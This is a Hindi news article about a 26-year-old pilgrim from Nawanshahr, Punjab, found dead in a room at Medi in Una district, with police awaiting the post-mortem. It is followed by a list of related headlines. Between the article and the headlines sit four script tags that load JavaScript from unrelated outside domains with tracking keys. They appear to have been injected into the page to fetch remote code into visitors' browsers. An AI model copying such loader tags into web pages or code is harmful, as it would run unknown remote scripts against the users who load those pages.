<p>जिला ऊना के पुलिस थाना अंब के तहत मेडी में एक श्रद्धालु मृत हालत में मिला है। मृतक की पहचान बलवीर सिंह 26 साल पुत्र दर्शन सिंह निवासी काठगढ़ नवांशहर पंजाब के रूप में हुई है। पुलिस ने शव को कब्जे में लेकर पोस्टमार्टम के लिए अस्पताल भेज दिया है। पुलिस मामले की जांच कर रही है। अभी तक यह पता नहीं चल पाया है कि श्रद्धालु की मौत किन कारणों से हुई है। जानकारी के अनुसार नवा शहर का श्रद्धालु बलवीर सिंह एक जत्थे के साथ बाबा बडभाग सिंह में माथा टेकने आया था।</p>
<p>श्रद्धालुओं के अनुसार दोपहर तक बलवीर ठीक था शाम करीब 4:00 बजे लोगों ने देखा कि वह कमरे में मृत पड़ा है। मामले की सूचना पुलिस को दी गई। पुलिस ने मौके पर आकर शव को कब्जे में ले लिया है । पुलिस अब शव का पोस्टमार्टम करवाएगी। पोस्टमार्टम रिपोर्ट आने के बाद ही मौत के कारणों का खुलासा हो पाएगा। डीएसपी मनोज जम्वाल ने कहा कि पुलिस मामले की जांच कर रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1573619936255″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
हिमाचल प्रदेश के चंबा जिले के मतियारा गांव में शादी का माहौल उस समय मातम…
Satoun School hockey achievement : सतोन पी एम श्री राजकीय वरिष्ठ माध्यमिक पाठशाला की छात्राओं…
Samarth campaign disaster preparedness: हिमाचल प्रदेश के आपदा प्रबंधन विभाग द्वारा आपदा से निपटने के…
Rainfall Deficit 2024: मानसून की विदाई के बाद हिमाचल प्रदेश में अक्टूबर के पहले 13…
Water Guards Promotion 2024: जलशक्ति विभाग में 12 साल का सेवाकाल पूरा कर चुके 184…
Mumbai: महाराष्ट्र के पूर्व मंत्री और राष्ट्रवादी कांग्रेस पार्टी (राकांपा) नेता बाबा सिद्दीकी की हत्या…